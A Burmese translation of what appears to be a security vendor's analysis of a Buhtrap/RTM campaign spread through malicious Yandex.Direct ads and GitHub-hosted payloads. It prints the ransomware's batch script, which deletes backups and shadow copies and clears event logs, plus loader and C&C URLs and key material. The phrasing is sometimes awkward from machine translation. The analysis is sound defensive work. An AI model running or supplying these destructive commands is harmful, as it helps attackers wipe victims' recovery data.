Backdoor နှင့် Buhtrap ကုဒ်ဝှက်စနစ်ကို Yandex.Direct သုံးပြီး ဖြန့်ဝေခဲ့သည်။

ဆိုက်ဘာတိုက်ခိုက်မှုတစ်ခုတွင် စာရင်းကိုင်များကို ပစ်မှတ်ထားရန်၊ ၎င်းတို့သည် အွန်လိုင်းတွင် ရှာဖွေသည့် အလုပ်စာရွက်စာတမ်းများကို အသုံးပြုနိုင်သည်။ ဤသည်မှာ အကြမ်းဖျင်းအားဖြင့် လွန်ခဲ့သည့်လအနည်းငယ်အတွင်း ဆိုက်ဘာအဖွဲ့တစ်ဖွဲ့သည် လူသိများသော backdoors များကို ဖြန့်ဝေခြင်းဖြစ်သည်။ Buhtrap и RTMcryptocurrencies ခိုးယူခြင်းအတွက် ကုဒ်ဝှက်စနစ်များနှင့် ဆော့ဖ်ဝဲများ။ ပစ်မှတ်အများစုသည် ရုရှားတွင် တည်ရှိသည်။ Yandex.Direct တွင် အန္တရာယ်ရှိသော ကြော်ငြာများတင်ခြင်းဖြင့် တိုက်ခိုက်မှုကို လုပ်ဆောင်ခဲ့ခြင်းဖြစ်သည်။ ဖြစ်နိုင်ချေရှိသော သားကောင်များကို စာရွက်စာတမ်း နမူနာပုံစံအဖြစ် အသွင်ပြောင်းထားသော အန္တရာယ်ရှိသော ဖိုင်ကို ဒေါင်းလုဒ်လုပ်ရန် တောင်းဆိုသည့် ဝဘ်ဆိုက်တစ်ခုသို့ ညွှန်ကြားခဲ့သည်။ ကျွန်ုပ်တို့သတိပေးပြီးနောက် Yandex သည် အန္တရာယ်ရှိသော ကြော်ငြာကို ဖယ်ရှားခဲ့သည်။

Buhtrap ၏အရင်းအမြစ်ကုဒ်သည် ယခင်က အွန်လိုင်းတွင်ပေါက်ကြားခဲ့ပြီး မည်သူမဆို ၎င်းကိုအသုံးပြုနိုင်ပါသည်။ RTM ကုဒ်ရရှိနိုင်မှုနှင့်ပတ်သက်၍ ကျွန်ုပ်တို့တွင် အချက်အလက်မရှိပါ။

ဤပို့စ်တွင် တိုက်ခိုက်သူများသည် Yandex.Direct ကိုအသုံးပြု၍ ၎င်းကို GitHub တွင် ထားရှိပုံအား ကျွန်ုပ်တို့ ပြောပြပါမည်။ ပို့စ်သည် malware ၏နည်းပညာပိုင်းဆိုင်ရာခွဲခြမ်းစိတ်ဖြာမှုဖြင့်နိဂုံးချုပ်မည်ဖြစ်သည်။

Buhtrap နှင့် RTM တို့သည် လုပ်ငန်းပြန်စနေပြီဖြစ်သည်။

ယန္တရားပြန့်ပွားခြင်း နှင့် သားကောင်များ

သားကောင်များထံ ပေးပို့သော ဝန်ထုပ်ဝန်ပိုး အမျိုးမျိုးသည် ဘုံပြန့်ပွားမှု ယန္တရားတစ်ခု ရှိသည်။ တိုက်ခိုက်သူများ ဖန်တီးထားသည့် အန္တရာယ်ရှိသော ဖိုင်အားလုံးကို မတူညီသော GitHub သိုလှောင်မှုနှစ်ခုတွင် ထားရှိထားပါသည်။

ပုံမှန်အားဖြင့်၊ repository တွင် မကြာခဏပြောင်းလဲနေသော ဒေါင်းလုဒ်လုပ်နိုင်သော အန္တရာယ်ရှိသောဖိုင်တစ်ခုပါရှိသည်။ GitHub သည် repository တစ်ခုသို့ပြောင်းလဲမှုများ၏သမိုင်းကိုကြည့်ရှုရန်သင့်အားခွင့်ပြုထားသောကြောင့်၊ အချို့သောကာလအတွင်းမည်သည့် malware ဖြန့်ဝေခဲ့သည်ကိုကျွန်ုပ်တို့မြင်နိုင်သည်။ အန္တရာယ်ရှိသောဖိုင်ကို ဒေါင်းလုဒ်လုပ်ရန် သားကောင်အား ဆွဲဆောင်ရန်၊ အထက်ပုံတွင်ပြထားသည့် ဝဘ်ဆိုဒ် blanki-shabloni24[.]ru ကို အသုံးပြုခဲ့သည်။

ဆိုက်၏ ဒီဇိုင်းနှင့် အန္တရာယ်ရှိသော ဖိုင်များ၏ အမည်များ အားလုံးသည် တစ်ခုတည်းသော အယူအဆ ဖြစ်သည် - ပုံစံများ၊ နမူနာများ၊ စာချုပ်များ၊ နမူနာများ စသည်တို့ကို လိုက်နာပါသည်။ Buhtrap နှင့် RTM ဆော့ဖ်ဝဲလ်ကို ယခင်က စာရင်းကိုင်များကို တိုက်ခိုက်ရာတွင် အသုံးပြုထားပြီးဖြစ်သည်ဟု ယူဆပါက၊ ကမ်ပိန်းအသစ်မှာ ဗျူဟာက အတူတူပါပဲ။ တစ်ခုတည်းသောမေးခွန်းမှာ အကြမ်းဖက်တိုက်ခိုက်သူများ၏ဆိုက်သို့ မည်သို့ရောက်ရှိသွားခြင်းပင်ဖြစ်သည်။

ရောဂါပိုး

အနည်းဆုံး ဤဆိုက်တွင် ပြီးဆုံးသွားသော ဖြစ်နိုင်ချေရှိသော သားကောင်အများအပြားကို အန္တရာယ်ရှိသော ကြော်ငြာများဖြင့် ဆွဲဆောင်ခဲ့သည်။ အောက်တွင် ဥပမာ URL တစ်ခုဖြစ်သည်။

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

လင့်ခ်မှ သင်တွေ့မြင်ရသည့်အတိုင်း၊ တရားဝင်စာရင်းကိုင်ဖိုရမ် bb.f2[.]kz တွင် နဖူးစည်းတင်ထားသည်။ မတူညီသောဝဘ်ဆိုက်များတွင် ပေါ်လာသည့်နဖူးစည်းများ၊ အားလုံးတွင် တူညီသောမဲဆွယ်စည်းရုံးရေးအိုင်ဒီ (blanki_rsya) နှင့် စာရင်းကိုင် သို့မဟုတ် ဥပဒေရေးရာအကူအညီပေးရေးဝန်ဆောင်မှုများနှင့် ပတ်သက်သည့် အများဆုံးဖြစ်ကြောင်း သတိပြုရန် အရေးကြီးပါသည်။ အလားအလာရှိသော သားကောင်သည် ပစ်မှတ်ထားသော တိုက်ခိုက်မှုများအတွက် ကျွန်ုပ်တို့၏ ယူဆချက်ကို ပံ့ပိုးပေးသည့် တောင်းဆိုချက် “ဒေါင်းလုဒ် ငွေတောင်းခံလွှာ” ကို အသုံးပြုထားကြောင်း URL က ပြသသည်။ အောက်တွင် နဖူးစည်းများ ပေါ်လာသည့် ဆိုက်များနှင့် သက်ဆိုင်ရာ ရှာဖွေမှု စုံစမ်းမေးမြန်းမှုများ ဖြစ်သည်။

• ပြေစာဖောင်ကို ဒေါင်းလုဒ်လုပ်ပါ - bb.f2[.]kz
• နမူနာစာချုပ် - Ipopen[.]ru
• လျှောက်လွှာတိုင်ကြားချက်နမူနာ - 77metrov[.]ru
• သဘောတူညီချက်ပုံစံ - ဗလာ-dogovor-kupli-prodazhi[.]ru
• နမူနာတရားရုံး အသနားခံစာ - zen.yandex[.]ru
• နမူနာတိုင်ကြားချက် - yurday[.]ru
• နမူနာ စာချုပ်ပုံစံများ – Regforum[.]ru
• စာချုပ်ပုံစံ – assistentus[.]ru
• နမူနာတိုက်ခန်း သဘောတူညီချက် – napravah[.]com
• တရားဝင်စာချုပ်နမူနာများ - Avito[.]ru

blanki-shabloni24[.]ru site သည် ရိုးရှင်းသော အမြင်အာရုံ အကဲဖြတ်မှုကို ကျော်ဖြတ်ရန် ပြင်ဆင်သတ်မှတ်ထားသည်။ ပုံမှန်အားဖြင့်၊ GitHub သို့ လင့်ခ်တစ်ခုပါသော ပရော်ဖက်ရှင်နယ်ပုံစံဆိုက်တစ်ခုကို ညွှန်ပြသော ကြော်ငြာတစ်ခုသည် သိသိသာသာဆိုးရွားပုံမပေါ်ပါ။ ထို့အပြင်၊ တိုက်ခိုက်သူများသည် ကမ်ပိန်းကာလအတွင်း ဖြစ်နိုင်သည်မှာ ကန့်သတ်ကာလတစ်ခုအတွက်သာ သိုလှောင်ရုံသို့ အန္တရာယ်ရှိသောဖိုင်များကို အပ်လုဒ်လုပ်ကြသည်။ အချိန်အများစုတွင်၊ GitHub သိုလှောင်မှုတွင် ဗလာဇစ်မှတ်တမ်း သို့မဟုတ် အလွတ် EXE ဖိုင်တစ်ခုပါရှိသည်။ ထို့ကြောင့်၊ တိုက်ခိုက်သူများသည် တိကျသောရှာဖွေမှုမေးမြန်းချက်များကို တုံ့ပြန်သည့်အနေဖြင့် စာရင်းကိုင်များမှ လာရောက်လည်ပတ်နိုင်ခြေအရှိဆုံး ဝဘ်ဆိုက်များပေါ်တွင် Yandex.Direct မှတစ်ဆင့် ကြော်ငြာဖြန့်ဝေနိုင်သည်။

နောက်တစ်ခု၊ အမျိုးမျိုးသော payloads များကိုဤနည်းဖြင့်ကြည့်ရှုကြပါစို့။

Payload Analysis

ဖြန့်ချီရေးဆိုင်ရာ အချိန်ဇယား

အန္တရာယ်ရှိသော ကမ်ပိန်းသည် 2018 ခုနှစ် အောက်တိုဘာလကုန်တွင် စတင်ခဲ့ပြီး စာရေးနေချိန်တွင် အသက်ဝင်ပါသည်။ သိုလှောင်မှုတစ်ခုလုံးကို GitHub တွင် လူသိရှင်ကြားရနိုင်သောကြောင့်၊ ကျွန်ုပ်တို့သည် မတူညီသော malware မိသားစုခြောက်ခု၏ ဖြန့်ဝေမှုဆိုင်ရာ တိကျသောအချိန်ဇယားကို ပြုစုခဲ့သည် (အောက်ပါပုံကိုကြည့်ပါ)။ git မှတ်တမ်းနှင့် နှိုင်းယှဉ်ရန်အတွက် ESET တယ်လီမက်ထရီ တိုင်းတာသည့်အတိုင်း နဖူးစည်းလင့်ခ်ကို ရှာဖွေတွေ့ရှိသည့်အခါ ပြသသည့်စာကြောင်းကို ကျွန်ုပ်တို့ ထည့်သွင်းထားပါသည်။ သင်တွေ့မြင်ရသည့်အတိုင်း၊ ၎င်းသည် GitHub ရှိ payload ရရှိနိုင်မှုနှင့် ကောင်းမွန်စွာဆက်စပ်နေသည်။ သိုလှောင်မှုအား အပြည့်အဝမရမီ GitHub မှ ဖယ်ရှားထားသောကြောင့် ကျွန်ုပ်တို့တွင် ပြောင်းလဲမှုမှတ်တမ်း၏ အစိတ်အပိုင်းမရှိသည့်အတွက် ဖေဖော်ဝါရီလကုန်တွင် ကွဲလွဲမှုကို ရှင်းပြနိုင်ပါသည်။

ပုံ 1. Malware ဖြန့်ချီမှု၏ အချိန်ဇယား။

ကုဒ်လက်မှတ်ထိုးခြင်း လက်မှတ်များ

ကမ်ပိန်းတွင် လက်မှတ်များစွာကို အသုံးပြုခဲ့သည်။ အချို့ကို malware မိသားစုတစ်ခုထက်ပိုသော လက်မှတ် ရေးထိုးထားသောကြောင့် မတူညီသောနမူနာများသည် တူညီသောကမ်ပိန်းတွင်ပါဝင်ကြောင်း ထပ်လောင်းဖော်ပြသည်။ သီးသန့်သော့ရရှိနိုင်သော်လည်း၊ အော်ပရေတာများသည် binaries များကိုစနစ်တကျလက်မှတ်မထိုးဘဲ နမူနာအားလုံးအတွက်သော့ကို အသုံးမပြုခဲ့ပါ။ 2019 ခုနှစ် ဖေဖော်ဝါရီလနှောင်းပိုင်းတွင်၊ တိုက်ခိုက်သူများသည် ၎င်းတို့တွင် ကိုယ်ပိုင်သော့မပါသည့်အတွက် Google ပိုင်လက်မှတ်ကို အသုံးပြု၍ တရားမဝင်သော လက်မှတ်များကို စတင်ဖန်တီးခဲ့သည်။

ကမ်ပိန်းတွင်ပါ၀င်သည့် လက်မှတ်များနှင့် ၎င်းတို့လက်မှတ်ထိုးထားသည့် မဲလ်ဝဲမိသားစုများအားလုံးကို အောက်ပါဇယားတွင် ဖော်ပြထားပါသည်။

အခြား malware မိသားစုများနှင့် လင့်ခ်များတည်ဆောက်ရန် ဤကုဒ်လက်မှတ်ထိုးလက်မှတ်များကို ကျွန်ုပ်တို့လည်း အသုံးပြုထားပါသည်။ လက်မှတ်အများစုအတွက်၊ GitHub repository မှတဆင့် ဖြန့်ဝေမထားသော နမူနာများကို မတွေ့ပါ။ သို့သော်၊ TOV “MARIYA” လက်မှတ်ကို botnet နှင့်သက်ဆိုင်သည့် malware ကို လက်မှတ်ထိုးရန် အသုံးပြုခဲ့သည်။ Wauchos, adware နှင့် မိုင်းလုပ်သားများ။ ဤ malware သည် ဤကမ်ပိန်းနှင့် ဆက်စပ်မှုမရှိကြောင်း ဖြစ်နိုင်သည်။ အများစုမှာ၊ လက်မှတ်ကို darknet တွင်ဝယ်ယူခဲ့သည်။

Win32/Filecoder.Buhtrap

ကျွန်ုပ်တို့၏အာရုံကိုဖမ်းစားနိုင်သော ပထမဆုံးအစိတ်အပိုင်းမှာ အသစ်တွေ့ရှိထားသော Win32/Filecoder.Buhtrap ဖြစ်သည်။ ၎င်းသည် တစ်ခါတစ်ရံတွင် ထုပ်ပိုးထားသော Delphi ဒွိဖိုင်တစ်ခုဖြစ်သည်။ ၎င်းကို ဖေဖော်ဝါရီမှ မတ်လ 2019 တွင် အဓိကဖြန့်ဝေခဲ့သည်။ ၎င်းသည် ransomware ပရိုဂရမ်နှင့် လျော်ညီစွာ ပြုမူသည် - ၎င်းသည် ဒေသတွင်း ဒရိုက်ဗ်များနှင့် ကွန်ရက်ဖိုင်တွဲများကို ရှာဖွေပြီး တွေ့ရှိထားသော ဖိုင်များကို စာဝှက်ပေးသည်။ ကုဒ်ဝှက်ခြင်းသော့များပေးပို့ရန် ဆာဗာကို မဆက်သွယ်သောကြောင့် အပေးအယူလုပ်ရန် အင်တာနက်ချိတ်ဆက်မှု မလိုအပ်ပါ။ ယင်းအစား၊ ၎င်းသည် ရွေးနုတ်ဖိုးမက်ဆေ့ဂျ်၏အဆုံးတွင် “တိုကင်” ကို ပေါင်းထည့်ကာ အော်ပရေတာများနှင့် ဆက်သွယ်ရန်အတွက် အီးမေးလ် သို့မဟုတ် Bitmessage ကို အသုံးပြုရန် အကြံပြုထားသည်။

ထိလွယ်ရှလွယ် အရင်းအမြစ်များစွာကို တတ်နိုင်သမျှ ကုဒ်ဝှက်ရန်၊ Filecoder.Buhtrap သည် ကုဒ်ဝှက်ခြင်းကို အနှောင့်အယှက်ဖြစ်စေနိုင်သည့် အဖိုးတန်အချက်အလက်များပါရှိသော အဖွင့်ဖိုင်ကိုင်တွယ်ကိရိယာများပါသည့် သော့ဆော့ဖ်ဝဲကို ပိတ်ရန် ဒီဇိုင်းထုတ်ထားသော ချည်မျှင်တစ်ခုကို လုပ်ဆောင်သည်။ ပစ်မှတ်လုပ်ငန်းစဉ်များသည် အဓိကအားဖြင့် ဒေတာဘေ့စ်စီမံခန့်ခွဲမှုစနစ်များ (DBMS) ဖြစ်သည်။ ထို့အပြင်၊ Filecoder.Buhtrap သည် ဒေတာပြန်လည်ရယူရန်ခက်ခဲစေရန် မှတ်တမ်းဖိုင်များနှင့် အရန်များကို ဖျက်သည်။ ဒါကိုလုပ်ဖို့၊ အောက်က batch script ကို run လိုက်ပါ။

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap သည် ဝဘ်ဆိုက်လာရောက်သူများအကြောင်း အချက်အလက်စုဆောင်းရန် ဒီဇိုင်းထုတ်ထားသော တရားဝင်အွန်လိုင်း IP Logger ဝန်ဆောင်မှုကို အသုံးပြုပါသည်။ ၎င်းသည် command line ၏တာဝန်ဖြစ်သည့် ransomware ၏သားကောင်များကိုခြေရာခံရန်ရည်ရွယ်သည်-

mshta.exe "javascript:document.write('');"

ဖယ်ထုတ်ခြင်းစာရင်းသုံးခုနှင့် မကိုက်ညီပါက ကုဒ်ဝှက်ခြင်းအတွက် ဖိုင်များကို ရွေးချယ်မည်ဖြစ်သည်။ ပထမဦးစွာ၊ အောက်ပါ extension များပါရှိသော ဖိုင်များကို ကုဒ်ဝှက်မထားပါ- .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys နှင့် .bat. ဒုတိယအနေဖြင့်၊ လမ်းကြောင်းအပြည့်အစုံတွင် အောက်ပါစာရင်းမှ လမ်းညွှန်စာကြောင်းများပါရှိသော ဖိုင်အားလုံးကို ဖယ်ထုတ်ထားသည်။

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

တတိယ၊ အချို့သောဖိုင်အမည်များကိုလည်း ကုဒ်ဝှက်ခြင်းမှ ဖယ်ထုတ်ထားပြီး ၎င်းတို့အနက်မှ ရွေးနုတ်ဖိုးမက်ဆေ့ဂျ်၏ ဖိုင်အမည်ဖြစ်သည်။ စာရင်းကို အောက်တွင်ဖော်ပြထားသည်။ ထင်ရှားသည်မှာ၊ ဤခြွင်းချက်များအားလုံးသည် စက်လည်ပတ်နေစေရန် ရည်ရွယ်သော်လည်း လမ်းနှင့်ထိုက်တန်မှုအနည်းဆုံးဖြင့် လုပ်ဆောင်ခြင်းဖြစ်သည်။

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ဖိုင် ကုဒ်ဝှက်ခြင်း အစီအစဉ်

လုပ်ဆောင်ပြီးသည်နှင့်၊ malware သည် 512-bit RSA သော့တွဲတစ်ခုကို ထုတ်ပေးသည်။ ထို့နောက် သီးသန့်ထပ်ကိန်း (d) နှင့် modulus (n) ကို hard-coded 2048-bit public key (public exponent နှင့် modulus)၊ zlib-packed နှင့် base64 encode ဖြင့် ကုဒ်ဝှက်ထားသည်။ ၎င်းအတွက် တာဝန်ရှိသောကုဒ်ကို ပုံ 2 တွင် ပြထားသည်။

ပုံ 2. 512-bit RSA သော့တွဲမျိုးဆက်ဖြစ်စဉ်၏ Hex-Rays ခွဲထုတ်ခြင်း၏ရလဒ်။

အောက်တွင်ဖော်ပြထားသည်မှာ ရွေးနုတ်ဖိုးမက်ဆေ့ဂျ်တွင် ပူးတွဲပါရှိသော တိုကင်တစ်ခုဖြစ်သည့် ထုတ်ပေးထားသော သီးသန့်သော့ဖြင့် ရိုးရိုးစာသား၏ ဥပမာတစ်ခုဖြစ်သည်။

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

တိုက်ခိုက်သူများ၏ အများသူငှာသော့ကို အောက်တွင် ဖော်ပြထားသည်။

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ဖိုင်များကို 128-bit သော့ဖြင့် AES-256-CBC ဖြင့် ကုဒ်ဝှက်ထားသည်။ ကုဒ်ဝှက်ထားသော ဖိုင်တစ်ခုစီအတွက်၊ သော့အသစ်နှင့် အစပြုခြင်း vector အသစ်ကို ထုတ်ပေးပါသည်။ သော့အချက်အလက်များကို ကုဒ်ဝှက်ထားသောဖိုင်၏အဆုံးတွင် ထည့်သွင်းထားသည်။ ကုဒ်ဝှက်ထားသောဖိုင်၏ ဖော်မတ်ကို စဉ်းစားကြည့်ရအောင်။
ကုဒ်ဝှက်ထားသော ဖိုင်များတွင် အောက်ပါ ခေါင်းစီးပါရှိသည်-

VEGA မှော်တန်ဖိုးကို ပေါင်းထည့်ခြင်းဖြင့် အရင်းအမြစ်ဖိုင်ဒေတာကို ပထမ 0x5000 bytes သို့ ကုဒ်ဝှက်ထားသည်။ ကုဒ်ဝှက်ခြင်းဆိုင်ရာ အချက်အလက်အားလုံးကို အောက်ပါဖွဲ့စည်းပုံပါရှိသော ဖိုင်တစ်ခုသို့ တွဲထားသည်။

- ဖိုင်အရွယ်အစား အမှတ်အသားတွင် ဖိုင်အရွယ်အစားသည် 0x5000 bytes ထက် ကြီးမားခြင်းရှိမရှိ ညွှန်ပြသည့် အမှတ်အသားပါရှိသည်။
— AES သော့ blob = ZlibCompress(RSAEncrypt(AES သော့ + IV၊ ထုတ်လုပ်ပြီး RSA သော့တွဲ၏ အများသူငှာသော့))
- RSA သော့ blob = ZlibCompress(RSAEncrypt(ထုတ်ပေးသော RSA သီးသန့်သော့၊ hard-coded RSA အများသူငှာသော့))

Win32/ClipBanker

Win32/ClipBanker သည် 2018 ခုနှစ် အောက်တိုဘာလနှောင်းပိုင်းမှ ဒီဇင်ဘာလအစောပိုင်းအထိ ဆက်တိုက်ဖြန့်ဝေခဲ့သော အစိတ်အပိုင်းတစ်ခုဖြစ်သည်။ ၎င်း၏အခန်းကဏ္ဍသည် clipboard ၏အကြောင်းအရာများကိုစောင့်ကြည့်ရန်ဖြစ်ပြီး၊ ၎င်းသည် cryptocurrency ပိုက်ဆံအိတ်များ၏လိပ်စာများကိုရှာဖွေသည်။ ပစ်မှတ်ပိုက်ဆံအိတ်လိပ်စာကို ဆုံးဖြတ်ပြီးနောက်၊ ClipBanker သည် ၎င်းအား အော်ပရေတာများပိုင်သည်ဟု ယူဆရသည့် လိပ်စာတစ်ခုဖြင့် အစားထိုးသည်။ ကျွန်ုပ်တို့စစ်ဆေးထားသောနမူနာများသည် ထုပ်ပိုးထားခြင်းမဟုတ်၊ ရှုပ်ထွေးမှုမရှိပါ။ အပြုအမူကို ဖုံးကွယ်ရန် အသုံးပြုသည့် တစ်ခုတည်းသော ယန္တရားမှာ string encryption ဖြစ်သည်။ အော်ပရေတာပိုက်ဆံအိတ်လိပ်စာများကို RC4 အသုံးပြု၍ ကုဒ်ဝှက်ထားသည်။ ပစ်မှတ် cryptocurrencies များသည် Bitcoin၊ Bitcoin ငွေသား၊ Dogecoin၊ Ethereum နှင့် Ripple တို့ဖြစ်သည်။

Malware သည် တိုက်ခိုက်သူများ၏ Bitcoin ပိုက်ဆံအိတ်များသို့ ပျံ့နှံ့နေချိန်အတွင်း၊ ကမ်ပိန်း၏အောင်မြင်မှုကို သံသယဖြစ်စေသည့် VTS သို့ ပမာဏအနည်းငယ်ကို ပေးပို့ခဲ့သည်။ ထို့အပြင်၊ ဤငွေပေးငွေယူများသည် ClipBanker နှင့် လုံးဝဆက်စပ်နေကြောင်း သက်သေပြရန် အထောက်အထားမရှိပါ။

Win32/RTM

Win32/RTM အစိတ်အပိုင်းကို မတ်လ 2019 အစောပိုင်းတွင် ရက်အတော်ကြာ ဖြန့်ဝေခဲ့သည်။ RTM သည် ဝေးလံခေါင်သီသော ဘဏ်လုပ်ငန်းစနစ်များအတွက် ရည်ရွယ်၍ Delphi တွင် ရေးသားထားသော Trojan ဘဏ်လုပ်ငန်းရှင်ဖြစ်သည်။ 2017 ခုနှစ်တွင် ESET သုတေသီများကထုတ်ဝေခဲ့သည်။ အသေးစိတ်ခွဲခြမ်းစိတ်ဖြာ ဤပရိုဂရမ်၏ ဖော်ပြချက်သည် ဆက်စပ်ဆဲဖြစ်သည်။ 2019 ခုနှစ် ဇန်နဝါရီလတွင် Palo Alto Networks မှလည်း ထုတ်ပြန်ခဲ့သည်။ RTM အကြောင်း ဘလော့ဂ်ပို့စ်.

Buhtrap Loader

ယခင်က Buhtrap ကိရိယာများနှင့် မတူသော ဒေါင်းလုဒ်ကိရိယာကို GitHub တွင် အချိန်အတန်ကြာ ရနိုင်သည်။ သူလှည့်ကြည့်သည်။ https://94.100.18[.]67/RSS.php?<some_id> နောက်တစ်ဆင့်တက်ဖို့နဲ့ memory ထဲကို တိုက်ရိုက်တင်ပါ။ ဒုတိယအဆင့်ကုဒ်၏ အပြုအမူနှစ်ခုကို ခွဲခြားနိုင်သည်။ ပထမ URL တွင်၊ RSS.php သည် Buhtrap backdoor ကို တိုက်ရိုက်ကျော်သွားသည် - ဤ backdoor သည် source code ပေါက်ကြားပြီးနောက် ရရှိနိုင်သည့်အရာနှင့် အလွန်ဆင်တူသည်။

စိတ်ဝင်စားစရာမှာ၊ Buhtrap backdoor ဖြင့် ကမ်ပိန်းများစွာကို ကျွန်ုပ်တို့တွေ့မြင်ရပြီး ၎င်းတို့ကို မတူညီသော အော်ပရေတာများက လုပ်ဆောင်သည်ဟု စွပ်စွဲထားသည်။ ဤကိစ္စတွင်၊ အဓိကခြားနားချက်မှာ backdoor သည် memory ထဲသို့ တိုက်ရိုက်တင်ပြီး ကျွန်ုပ်တို့ပြောခဲ့သော DLL ဖြန့်ကျက်မှုလုပ်ငန်းစဉ်နှင့်အတူ ပုံမှန်အစီအစဥ်ကို အသုံးမပြုခြင်းဖြစ်သည်။ အရင်က. ထို့အပြင်၊ အော်ပရေတာများသည် ကွန်ရက်အသွားအလာကို စာဝှက်ရန်အသုံးပြုသည့် RC4 သော့ကို C&C ဆာဗာသို့ ပြောင်းလဲခဲ့သည်။ ကျွန်ုပ်တို့တွေ့ဖူးသည့် ကမ်ပိန်းအများစုတွင် အော်ပရေတာများသည် ဤသော့ကိုပြောင်းရန် စိတ်မ၀င်စားပါ။

ဒုတိယ၊ ပိုရှုပ်ထွေးသော အပြုအမူမှာ RSS.php URL ကို အခြား loader သို့ လွှဲပြောင်းပေးခြင်းဖြစ်သည်။ ၎င်းသည် ပြောင်းလဲနေသော တင်သွင်းမှုဇယားကို ပြန်လည်တည်ဆောက်ခြင်းကဲ့သို့သော ရှုပ်ထွေးမှုအချို့ကို လုပ်ဆောင်ခဲ့သည်။ bootloader ၏ရည်ရွယ်ချက်မှာ C&C ဆာဗာကိုဆက်သွယ်ရန်ဖြစ်သည်။ msiofficeupd[.]com/api/F27F84EDA4D13B15/2၊ မှတ်တမ်းများကို ပေးပို့ပြီး တုံ့ပြန်ချက်ကို စောင့်ပါ။ ၎င်းသည် တုံ့ပြန်မှုကို blob အဖြစ် လုပ်ဆောင်ပြီး၊ ၎င်းကို မှတ်ဉာဏ်ထဲသို့ တင်ကာ ၎င်းကို လုပ်ဆောင်သည်။ ဤ loader ကိုလုပ်ဆောင်ရာတွင်ကျွန်ုပ်တို့တွေ့ခဲ့သည့် payload သည် Buhtrap backdoor နှင့်အတူတူဖြစ်သည်၊ သို့သော်အခြားအစိတ်အပိုင်းများလည်းရှိနိုင်သည်။

Android/Spy.Banker

စိတ်ဝင်စားစရာမှာ Android အတွက် အစိတ်အပိုင်းတစ်ခုကို GitHub သိုလှောင်မှုတွင် တွေ့ရှိခဲ့သည်။ သူသည် ၂၀၁၈ ခုနှစ်၊ နိုဝင်ဘာလ ၁ ရက် - ပင်မဌာနခွဲတွင် တစ်ရက်သာရှိခဲ့သည်။ GitHub တွင် ပို့စ်တင်ခြင်းမှလွဲ၍ ESET telemetry သည် ဤ malware ဖြန့်ဝေနေသည့် အထောက်အထားကို မတွေ့ရှိရပါ။

အစိတ်အပိုင်းကို Android အပလီကေးရှင်း ပက်ကေ့ချ် (APK) အဖြစ် လက်ခံထားသည်။ အလွန်ရှုပ်ထွေးနေပါသည်။ APK ရှိ ကုဒ်ဝှက်ထားသော JAR တွင် အန္တရာယ်ရှိသော အပြုအမူကို ဝှက်ထားသည်။ ဤသော့ကိုအသုံးပြု၍ ၎င်းကို RC4 ဖြင့် ကုဒ်ဝှက်ထားသည်။

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

